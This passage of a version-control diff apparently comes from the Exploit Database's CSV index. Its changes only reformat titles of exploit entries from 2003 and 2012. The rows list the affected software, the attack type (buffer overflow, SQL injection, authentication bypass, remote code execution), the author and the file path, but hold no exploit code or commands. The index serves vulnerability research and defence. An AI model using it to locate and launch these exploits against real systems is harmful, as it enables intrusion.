Passthru",2012-11-21,Metasploit,linux,remote,0 -22857,platforms/jsp/webapps/22857.txt,"Verity K2 Toolkit 2.20 Query Builder Search Script Cross-Site Scripting",2003-07-02,"SSR Team",jsp,webapps,0 +22857,platforms/jsp/webapps/22857.txt,"Verity K2 Toolkit 2.20 Query Builder Search Script - Cross-Site Scripting",2003-07-02,"SSR Team",jsp,webapps,0 22858,platforms/openbsd/remote/22858.txt,"OpenBSD 3.x - PF RDR Network Information Leakage",2003-07-02,Ed3f,openbsd,remote,0 22859,platforms/multiple/dos/22859.txt,"Axis Print Server 6.15/6.20 Web Interface Denial of Service",2003-07-03,"Ian Vitek",multiple,dos,0 22860,platforms/linux/local/22860.c,"GNU Chess 5.0 - Local Buffer Overflow",2003-07-03,ace,linux,local,0 @@ -20108,7 +20108,7 @@ id,file,description,date,author,platform,type,port 22866,platforms/asp/webapps/22866.txt,"ProductCart 1.5/1.6/2.0 MSG.ASP Cross-Site Scripting",2003-07-05,atomix,asp,webapps,0 22867,platforms/multiple/remote/22867.pl,"Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure",2003-07-05,rs2112,multiple,remote,0 22868,platforms/asp/webapps/22868.txt,"ProductCart 1.5/1.6/2.0 - File Disclosure",2003-07-05,"Tri Huynh",asp,webapps,0 -22869,platforms/windows/remote/22869.html,"Microsoft Outlook 5.5/2000 Web Access HTML Attachment Script Execution",2003-07-05,"Hugo Vazquez",windows,remote,0 +22869,platforms/windows/remote/22869.html,"Microsoft Outlook 5.5/2000 - Web Access HTML Attachment Script Execution",2003-07-05,"Hugo Vazquez",windows,remote,0 22870,platforms/windows/local/22870.txt,"Microsoft Windows XP/2000 RunDLL32.EXE Buffer Overflow",2003-07-06,"Rick Patel",windows,local,0 22871,platforms/windows/remote/22871.c,"IglooFTP PRO 3.8 - Multiple Buffer Overflow Vulnerabilities (1)",2003-07-07,vkhoshain,windows,remote,0 22872,platforms/windows/remote/22872.txt,"IglooFTP PRO 3.8 - Multiple Buffer Overflow Vulnerabilities (2)",2003-07-07,"Peter Winter-Smith",windows,remote,0 @@ -20130,8 +20130,8 @@ id,file,description,date,author,platform,type,port 22885,platforms/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 Failure To Validate Credentials",2003-07-09,G00db0y,asp,webapps,0 22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server Download.php Directory Traversal",2003-07-09,"SSR Team",php,webapps,0 22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 - Mainfile.php Remote File Inclusion",2003-07-10,theblacksheep,php,webapps,0 -22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 shopexd.asp SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0 -22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 shopexd.asp SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0 +22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0 +22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0 22890,platforms/freebsd/remote/22890.pl,"cftp 0.12 Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,freebsd,remote,0 22891,platforms/freebsd/remote/22891.pl,"IglooFTP 0.6.1 Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,freebsd,remote,0 22892,platforms/windows/remote/22892.txt,"Mabry Software HTTPServer/X 1.0 0.047 - File Disclosure",2003-07-11,dr_insane,windows,remote,0 @@ -20140,14 +20140,14 @@ id,file,description,date,author,platform,type,port 22895,platforms/asp/webapps/22895.txt,"ASP-DEV Discussion Forum 2.0 - Admin Directory Weak Default Permissions",2003-07-13,G00db0y,asp,webapps,0 22896,platforms/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,php,webapps,0 22897,platforms/linux/dos/22897.c,"Twilight WebServer 1.3.3.0 - GET Request Buffer Overflow",2003-07-07,posidron,linux,dos,0 -22898,platforms/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router Information Disclosure",2003-07-14,cw,hardware,remote,0 +22898,platforms/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,hardware,remote,0 22899,platforms/windows/dos/22899.txt,"StarSiege Tribes Server Denial of Service (1)",2003-06-10,st0ic,windows,dos,0 22900,platforms/windows/dos/22900.php,"StarSiege Tribes Server Denial of Service (2)",2003-07-14,st0ic,windows,dos,0 22901,platforms/php/webapps/22901.txt,"BlazeBoard 1.0 Information Disclosure",2003-07-14,JackDaniels,php,webapps,0 22902,platforms/linux/dos/22902.sh,"lighttpd 1.4.31 - Denial of Service PoC",2012-11-22,t4c,linux,dos,0 -22903,platforms/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution",2012-11-22,Metasploit,windows,remote,0 +22903,platforms/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 - ldapagnt_eval() Remote Perl Code Execution",2012-11-22,Metasploit,windows,remote,0 22904,platforms/linux/dos/22904.py,"TrouSerS Denial of Service",2012-11-23,"Andy Lutomirski",linux,dos,0 -22905,platforms/windows/remote/22905.rb,"Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow",2012-11-24,Metasploit,windows,remote,0 +22905,platforms/windows/remote/22905.rb,"Apple QuickTime 7.7.2 - TeXML Style Element font-table Field Stack Buffer Overflow",2012-11-24,Metasploit,windows,remote,0 22906,platforms/php/webapps/22906.txt,"jBilling 3.0.2 - Cross-Site Scripting",2012-11-25,"Woody Hughes",php,webapps,0 22907,platforms/php/webapps/22907.txt,"ES CmS 0.1 - SQL Injection",2012-11-25,"hossein beizaee",php,webapps,0 22908,platforms/linux/remote/22908.c,"Exceed 5.0/6.0/6.1/7.1/8.0 Font Name Handler Buffer Overflow",2003-07-15,c0ntex,linux,remote,0 @@ -20171,11 +20171,11 @@ id,file,description,date,author,platform,type,port 22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 DB.php Information Disclosure",2003-07-24,"Artoor Petrovich",php,webapps,0 22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000_MSDE Named Pipe Denial of Service",2003-07-23,refdom,windows,dos,0 22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",php,webapps,0 -22959,platforms/windows/remote/22959.txt,"Microsoft Outlook Express 5/6 Script Execution Weakness",2003-07-25,http-equiv,windows,remote,0 +22959,platforms/windows/remote/22959.txt,"Microsoft Outlook Express 5/6 - Script Execution Weakness",2003-07-25,http-equiv,windows,remote,0 22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 - Malformed HTTP GET Denial of Service",2003-07-28,blackangels,hardware,dos,0 22963,platforms/cgi/webapps/22963.txt,"Softshoe Parse-file Cross-Site Scripting",2003-07-28,"Bahaa Naamneh",cgi,webapps,0 22964,platforms/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String",2003-07-28,lucipher,unix,remote,0 -22965,platforms/linux/local/22965.c,"XBlast 2.6.1 HOME Environment Variable Buffer Overflow",2003-07-28,c0wboy,linux,local,0 +22965,platforms/linux/local/22965.c,"XBlast 2.6.1 - HOME Environment Variable Buffer Overflow",2003-07-28,c0wboy,linux,local,0 22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow (1)",2003-07-29,D4rkGr3y,windows,remote,0 22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",php,webapps,0 22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal",2003-07-21,gr00vy,php,webapps,0 @@ -20198,7 +20198,7 @@ id,file,description,date,author,platform,type,port 22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - (Direct Retn)",2012-11-26,Nezim,windows,local,0 22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0 23006,platforms/php/remote/23006.rb,"Network Shutdown Module 3.21 - (sort_values) Remote PHP Code Injection",2012-11-29,Metasploit,php,remote,0 -23007,platforms/windows/local/23007.rb,"Windows AlwaysInstallElevated MSI",2012-11-29,Metasploit,windows,local,0 +23007,platforms/windows/local/23007.rb,"Windows - AlwaysInstallElevated MSI",2012-11-29,Metasploit,windows,local,0 23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 Subject Field HTML Injection",2003-08-11,G00db0y,php,webapps,0 23009,platforms/php/webapps/23009.txt,"Stellar Docs 1.2 - Path Disclosure",2003-08-11,G00db0y,php,webapps,0 23010,platforms/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder Remote Path Disclosure",2003-08-11,G00db0y,php,webapps,0 @@ -20218,14 +20218,14 @@ id,file,description,date,author,platform,type,port 22970,platforms/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 TCP Window Size Remote Denial of Service",2003-07-29,"Papa loves Mambo",windows,dos,0 22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow",2003-07-29,V9,linux,local,0 22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 -22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 MIME Type Buffer Overflow",2012-11-28,Metasploit,windows,remote,0 +22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 - MIME Type Buffer Overflow",2012-11-28,Metasploit,windows,remote,0 22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 - realpath() Off-By-One Buffer Overflow",2003-08-02,Xpl017Elz,unix,remote,0 23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 - Crash PoC",2012-11-29,p3kok,windows,dos,0 22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2_ 2.6.0_ 2.6.1 - realpath() Off-By-One Buffer Overflow",2003-08-06,Xpl017Elz,unix,remote,0 22976,platforms/freebsd/remote/22976.pl,"freeBSD 4.8 realpath() Off-By-One Buffer Overflow",2003-07-31,daniels@legend.co.uk,freebsd,remote,0 22977,platforms/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board SQL Injection",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps,0 22978,platforms/hardware/dos/22978.txt,"Cisco IOS 10/11/12 UDP Echo Service Memory Disclosure",2003-08-01,FX,hardware,dos,0 -22979,platforms/linux/local/22979.txt,"CDRTools 2.0 RSCSI Debug File Arbitrary Local File Manipulation",2003-08-01,"Secure Network Operations",linux,local,0 +22979,platforms/linux/local/22979.txt,"CDRTools 2.0 RSCSI Debug File - Arbitrary Local File Manipulation",2003-08-01,"Secure Network Operations",linux,local,0 22980,platforms/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 Device Driver Memory Overwrite",2003-08-02,"Lord Yup",windows,local,0 22981,platforms/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service (1)",2003-08-04,r3b00t,linux,dos,0 22982,platforms/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service (2)",2003-08-04,daniels@legend.co.uk,linux,dos,0 @@ -20272,7 +20272,7 @@ id,file,description,date,author,platform,type,port 23040,platforms/windows/remote/23040.c,"eMule 0.2x AttachToAlreadyKnown Double Free",2003-09-01,"Stefan Esser",windows,remote,0 23041,platforms/windows/local/23041.txt,"DeskSoft CheckMail 1.2 Password Disclosure",2003-08-19,"cyber talon",windows,local,0 23042,platforms/windows/dos/23042.pl,"Cerberus FTPServer 1.71/2.1/2.32 - Remote Denial of Service",2003-08-20,"real Remoter",windows,dos,0 -23043,platforms/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 SMIL File Script Execution",2003-08-19,KrazySnake,windows,remote,0 +23043,platforms/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 - .SMIL File Script Execution",2003-08-19,KrazySnake,windows,remote,0 23044,platforms/windows/remote/23044.txt,"Microsoft Internet Explorer 5/6 Object Type Validation",2003-08-20,"Drew Copley",windows,remote,0 23045,platforms/linux/dos/23045.pl,"ViRobot Linux Server 2.0",2003-08-20,kf,linux,dos,0 23046,platforms/openbsd/local/23046.c,"OpenBSD 3.3 Semget() Integer Overflow (1)",2003-08-20,blexim,openbsd,local,0 @@ -20282,7 +20282,7 @@ id,file,description,date,author,platform,type,port 23050,platforms/multiple/dos/23050.txt,"Avant Browser 8.0.2 Long HTTP Request Buffer Overflow",2003-08-21,nimber@designer.ru,multiple,dos,0 23051,platforms/multiple/dos/23051.txt,"WapServ 1.0 - Denial of Service",2003-08-22,"Blue eyeguy4u",multiple,dos,0 23052,platforms/windows/local/23052.rb,"BlazeVideo HDTV Player Pro 6.6 - Filename Handling",2012-12-01,Metasploit,windows,local,0 -23053,platforms/windows/dos/23053.pl,"Vpop3d Remote Denial of Service",2003-08-22,daniels@legend.co.uk,windows,dos,0 +23053,platforms/windows/dos/23053.pl,"Vpop3d - Remote Denial of Service",2003-08-22,daniels@legend.co.uk,windows,dos,0 23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Root Compromise",2003-08-23,kf,linux,remote,0 23055,platforms/asp/webapps/23055.txt,"IdealBB 1.4.9 Beta - HTML Injection",2003-08-23,"Scott M",asp,webapps,0 23056,platforms/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service Attack",2003-08-25,"Luca Ercoli",windows,dos,0 @@ -20298,7 +20298,7 @@ id,file,description,date,author,platform,type,port 23066,platforms/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 - Long Filename Buffer Overrun",2003-08-27,storm,windows,remote,0 23067,platforms/php/webapps/23067.txt,"eNdonesia 8.2/8.3 Mod Parameter Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps,0 23068,platforms/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal file disclosure",2003-08-30,sickle,windows,remote,0 -23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Information Disclosure",2003-08-30,"Martin Eiszner",multiple,remote,0 +23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Information Disclosure",2003-08-30,"Martin Eiszner",multiple,remote,0 23070,platforms/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal file disclosure",2003-08-30,"Martin Eiszner",multiple,remote,0 23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Cross-Site Scripting",2003-08-30,"Martin Eiszner",multiple,remote,0 23072,platforms/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps,0 @@ -20311,7 +20311,7 @@ id,file,description,date,author,platform,type,port 23079,platforms/windows/remote/23079.txt,"FreeFTPD - Remote Authentication Bypass Exploit (0Day)",2012-12-02,kingcope,windows,remote,0 23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass Exploit (0Day)",2012-12-02,kingcope,windows,remote,0 23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Preauth User Enumeration (0Day)",2012-12-02,kingcope,multiple,remote,0 -23082,platforms/linux/remote/23082.txt,"SSH.com Communications SSH Tectia Authentication Bypass Remote Exploit (0Day)",2012-12-02,kingcope,linux,remote,0 +23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit (0Day)",2012-12-02,kingcope,linux,remote,0 23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique) (0Day)",2012-12-02,kingcope,windows,remote,0 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 Message Field HTML Injection",2003-09-01,Trash-80,php,webapps,0 23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal File Disclosure",2003-09-01,"Zero X",cgi,webapps,0 @@ -20324,7 +20324,7 @@ id,file,description,date,author,platform,type,port 23092,platforms/windows/remote/23092.txt,"FloosieTek FTGatePro 1.22 Mail Server Cross-Site Scripting",2003-09-02,"Ziv Kamir",windows,remote,0 23093,platforms/windows/remote/23093.txt,"Microsoft Windows XP TCP Packet Information Leakage",2003-09-02,"Michal Zalewski",windows,remote,0 23094,platforms/windows/remote/23094.txt,"Microsoft Visual Basic For Applications SDK 5.0/6.0/6.2/6.3 Document Handling Buffer Overrun",2003-09-03,"eEye Digital Security Team",windows,remote,0 -23095,platforms/windows/remote/23095.c,"Microsoft Access 97/2000/2002 Snapshot Viewer ActiveX Control Parameter Buffer Overflow",2003-09-03,"Oliver Lavery",windows,remote,0 +23095,platforms/windows/remote/23095.c,"Microsoft Access 97/2000/2002 Snapshot Viewer - ActiveX Control Parameter Buffer Overflow",2003-09-03,"Oliver Lavery",windows,remote,0 23096,platforms/windows/local/23096.txt,"Microsoft WordPerfect Converter Buffer Overrun",2003-09-03,valgasu,windows,local,0 23097,platforms/php/webapps/23097.txt,"WebCalendar 0.9.x - colors.php color XSS",2003-09-03,noconflic,php,webapps,0 23098,platforms/php/webapps/23098.txt,"WebCalendar 0.9.x - week.php user XSS",2003-09-03,noconflic,php,webapps,0 @@ -20339,7 +20339,7 @@ id,file,description,date,author,platform,type,port 23109,platforms/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - CSRF",2012-12-03,"Ben Williams",multiple,webapps,0 23110,platforms/linux/webapps/23110.txt,"Symantec Messaging Gateway 9.5.3-3 - Arbitrary File Download",2012-12-03,"Ben Williams",linux,webapps,0 23111,platforms/multiple/webapps/23111.txt,"FirePass SSL VPN Unauthenticated Local File Inclusion",2012-12-03,"SEC Consult",multiple,webapps,0 -23112,platforms/linux/dos/23112.txt,"IBM DB2 db2dart Buffer Overflow",2003-09-18,"Martinez Kuhn",linux,dos,0 +23112,platforms/linux/dos/23112.txt,"IBM DB2 db2dart - Buffer Overflow",2003-09-18,"Martinez Kuhn",linux,dos,0 23113,platforms/windows/remote/23113.c,"Microsoft Exchange Server 4.0/5.0 SMTP HELO Argument Buffer Overflow",1998-03-10,Rootshell,windows,remote,0 23114,platforms/windows/remote/23114.txt,"Microsoft Internet Explorer 5/6 Browser Popup Window Object Type Validation",2003-09-07,http-equiv,windows,remote,0 23115,platforms/linux/remote/23115.c,"Mah-Jong 1.4 Client/Server Remote sscanf() Buffer Overflow",2003-09-07,V9,linux,remote,0 @@ -20358,9 +20358,9 @@ id,file,description,date,author,platform,type,port 23128,platforms/cgi/webapps/23128.txt,"Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Path Disclosure",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 23129,platforms/php/webapps/23129.txt,"Invision Power Board 1.x - Index.php Showtopic Cross-Site Scripting",2003-09-09,"Boy Bear",php,webapps,0 23130,platforms/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 WWW.exe Denial of Service",2003-09-10,"Phuong Nguyen",windows,dos,0 -23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6.0 Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 +23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6.0 - Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal (0Day)",2012-12-04,Nin3,windows,webapps,0 -23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 Custom App Remote Code Execution",2012-12-09,Metasploit,multiple,remote,0 +23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 - Custom App Remote Code Execution",2012-12-09,Metasploit,multiple,remote,0 23135,platforms/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 WebAdmin Interface Information Disclosure Weakness",2003-09-10,"Phuong Nguyen",windows,remote,0 23136,platforms/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,multiple,remote,0 23137,platforms/multiple/remote/23137.txt,"CacheFlow CacheOS 4.1.10016 HTTP HOST Proxy",2003-09-10,"Tim Kennedy",multiple,remote,0 @@ -20381,7 +20381,7 @@ id,file,description,date,author,platform,type,port 23152,platforms/windows/remote/23152.txt,"Yahoo! Webcam ActiveX Control 2.0.0.107 - Buffer Overrun",2003-09-16,cesaro,windows,remote,0 23153,platforms/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i Cross-Site Scripting",2003-09-16,dr_insane,cgi,webapps,0 23154,platforms/linux/local/23154.c,"Sendmail 8.12.9 Prescan() Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",linux,local,0 -23155,platforms/windows/remote/23155.rb,"Ektron 8.02 XSLT Transform Remote Code Execution",2012-12-05,Metasploit,windows,remote,0 +23155,platforms/windows/remote/23155.rb,"Ektron 8.02 - XSLT Transform Remote Code Execution",2012-12-05,Metasploit,windows,remote,0 23156,platforms/unix/remote/23156.rb,"Tectia SSH USERAUTH Change Request Password Reset",2012-12-05,Metasploit,unix,remote,0 23157,platforms/windows/remote/23157.txt,"Plug and Play Web Server 1.0 002c Directory Traversal",2003-09-18,"Bahaa Naamneh",windows,remote,0 23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 banners.php bid Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 @@ -20426,7 +20426,7 @@ id,file,description,date,author,platform,type,port 23197,platforms/linux/local/23197.c,"Mah-Jong 1.4 MJ-Player Server Flag Local Buffer Overflow",2003-09-29,jsk,linux,local,0 23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String",2003-09-29,"Luigi Auriemma",windows,remote,0 23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0 -23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow",2003-09-30,"Luigi Auriemma",linux,dos,0 +23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 - IRC Client Remote Buffer Overflow",2003-09-30,"Luigi Auriemma",linux,dos,0 23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 - (.swf) Crash PoC",2012-12-07,coolkaveh,windows,dos,0 23202,platforms/freebsd/webapps/23202.txt,"m0n0wall 1.33 - Multiple CSRF Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps,0 23203,platforms/windows/remote/23203.rb,"IBM System Director Agent DLL Injection",2012-12-07,Metasploit,windows,remote,0 @@ -20436,7 +20436,7 @@ id,file,description,date,author,platform,type,port 23207,platforms/php/webapps/23207.txt,"Atrise Everyfind 5.0.2 - search Cross-Site Scripting",2003-10-01,Ezhilan,php,webapps,0 23208,platforms/php/webapps/23208.txt,"mpnews pro 2.1.0.18 - Directory Traversal information disclosure",2003-10-01,"Gama Sec",php,webapps,0 23209,platforms/windows/remote/23209.txt,"mutant penguin mpweb pro 1.1.2 - Directory Traversal",2003-10-01,"GamaSec Security",windows,remote,0 -23210,platforms/windows/local/23210.c,"Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing",2003-10-02,"Brett Moore",windows,local,0 +23210,platforms/windows/local/23210.c,"Microsoft Windows XP/2000 PostThreadMessage() - Arbitrary Process Killing",2003-10-02,"Brett Moore",windows,local,0 23211,platforms/windows/remote/23211.cpp,"EarthStation 5 - Search Service Remote File Deletion",2003-10-03,"random nut",windows,remote,0 23212,platforms/hardware/remote/23212.txt,"Cisco LEAP Password Disclosure Weakness",2003-10-03,"Cisco Security",hardware,remote,0 23213,platforms/php/webapps/23213.txt,"WordPress 0.6/0.7 - Blog.Header.php SQL Injection",2003-10-03,"Seth Woolley",php,webapps,0 @@ -20450,8 +20450,8 @@ id,file,description,date,author,platform,type,port 23221,platforms/multiple/remote/23221.txt,"JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection",2003-10-06,"Marc Schoenefeld",multiple,remote,0 23222,platforms/windows/remote/23222.txt,"File Sharing Software Easy File Sharing Web Server 1.2 Information Disclosure",2003-10-06,nimber@designer.ru,windows,remote,0 23223,platforms/linux/local/23223.c,"SuSE Linux Professional 8.2 SuSEWM Configuration File Insecure Temporary File",2003-10-06,"Nash Leon",linux,local,0 -23225,platforms/windows/remote/23225.rb,"Maxthon3 about:history XCS Trusted Zone Code Execution",2012-12-09,Metasploit,windows,remote,0 -23226,platforms/windows/remote/23226.rb,"FreeFloat FTP Server Arbitrary File Upload",2012-12-09,Metasploit,windows,remote,21 +23225,platforms/windows/remote/23225.rb,"Maxthon3 - about:history XCS Trusted Zone Code Execution",2012-12-09,Metasploit,windows,remote,0 +23226,platforms/windows/remote/23226.rb,"FreeFloat FTP Server - Arbitrary File Upload",2012-12-09,Metasploit,windows,remote,21 23227,platforms/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component Command Injection",2012-12-09,Metasploit,unix,remote,0 23228,platforms/linux/local/23228.c,"SLocate 2.6 - User-Supplied Database Heap Overflow",2003-10-06,"Patrik Hornik",linux,local,0 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow",2003-10-07,DaveK,windows,remote,0 @@ -20481,15 +20481,15 @@ id,file,description,date,author,platform,type,port 23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 - Multiple SQL Injection",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23253,platforms/php/webapps/23253.txt,"achievo 1.4.5 - Multiple Vulnerabilities (2)",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",windows,dos,0 -23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control User32.dll Function Buffer Overrun",2003-10-15,"Brett Moore",windows,local,0 +23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control - User32.dll Function Buffer Overrun",2003-10-15,"Brett Moore",windows,local,0 23256,platforms/cfm/webapps/23256.txt,"Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting",2003-10-15,"Lorenzo Hernandez Garcia-Hierro",cfm,webapps,0 -23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 Example Scripts And Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0 +23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0 23258,platforms/linux/local/23258.c,"Oracle Database Server 9.0.x - Oracle Binary Local Buffer Overflow",2003-10-17,c0ntex,linux,local,0 23259,platforms/php/webapps/23259.txt,"GoldLink 3.0 Cookie SQL Injection",2003-10-18,Weke,php,webapps,0 23260,platforms/php/webapps/23260.sh,"Geeklog 1.3.8 Forgot Password SQL Injection",2003-10-19,"Jouko Pynnonen",php,webapps,0 23261,platforms/php/webapps/23261.txt,"Bytehoard 0.7 - File Disclosure",2003-10-20,Ezhilan,php,webapps,0 23262,platforms/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",jsp,webapps,0 -23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF Malformed Server Name Heap Corruption",2003-10-20,@stake,multiple,dos,0 +23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF - Malformed Server Name Heap Corruption",2003-10-20,@stake,multiple,dos,0 23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injection",2003-10-20,"Aviram Jenik",php,webapps,0 23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0 23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Path Disclosure",2003-10-20,Dr`Ponidi,cgi,webapps,0 @@ -20514,7 +20514,7 @@ id,file,description,date,author,platform,type,port 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0 23286,platforms/php/webapps/23286.txt,"Joomla JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0 -23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0 +23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 - IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0 23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - CSRF",2012-12-11,sajith,php,webapps,0 23290,platforms/windows/remote/23290.rb,"HP Data Protector - DtbClsLogin Buffer Overflow",2012-12-11,Metasploit,windows,remote,0 